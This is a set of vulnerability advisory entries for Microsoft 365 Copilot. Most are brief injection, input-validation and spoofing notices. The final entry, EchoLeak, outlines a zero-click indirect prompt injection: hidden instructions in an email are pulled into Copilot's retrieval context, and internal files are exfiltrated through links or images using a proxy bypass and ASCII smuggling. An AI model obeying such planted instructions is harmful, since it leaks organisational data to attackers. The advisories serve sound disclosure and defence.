Es7Evam

**Name of the Vulnerable Software and Affected Versions** M365 Copilot (affected versions not specified) **Description** Improper neutralization of special elements in Copilot Business Chat allows an unauthorized attacker to disclose information over a network. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** M365 Copilot (affected versions not specified) **Description** Improper neutralization of special elements in output used by a downstream component (injection) allows an unauthorized attacker to disclose information over a network. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** M365 Copilot (affected versions not specified) **Description** An improper validation of a specified input type in M365 Copilot can allow an unauthorized attacker to disclose information over a network. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Copilot (affected versions not specified) **Description** A spoofing issue exists in Copilot. This allows for potential misrepresentation or impersonation within the Copilot environment. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Microsoft 365 Copilot (affected versions not specified) **Description** A spoofing issue exists in Microsoft 365 Copilot. The vulnerability allows for potential misrepresentation of Copilot’s responses, potentially leading to user confusion or deception. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Copilot (affected versions not specified) **Description** A spoofing issue exists within Copilot. The vulnerability allows for potential manipulation of Copilot’s responses. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Microsoft 365 Copilot (affected versions not specified) **Description** EchoLeak is a critical zero-click issue in Microsoft 365 Copilot that allows an unauthorized remote attacker to exfiltrate sensitive organizational data from OneDrive, SharePoint, and Teams without any user interaction. The attack utilizes indirect prompt injection, where a crafted email containing hidden instructions is sent to a target. When the user later queries Copilot for routine tasks, the system retrieves the malicious email into its context via Microsoft Graph and follows the instructions to gather internal data. This data is then silently exfiltrated to the attacker's server by embedding it in reference-style links or images, bypassing Content Security Policies (CSP) through a trusted Microsoft Teams proxy and utilizing ASCII smuggling. The issue stems from a lack of data sanitization at the control level and scope violations within the Retrieval-Augmented Generation (RAG) engine, which mixes untrusted inputs with internal data. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.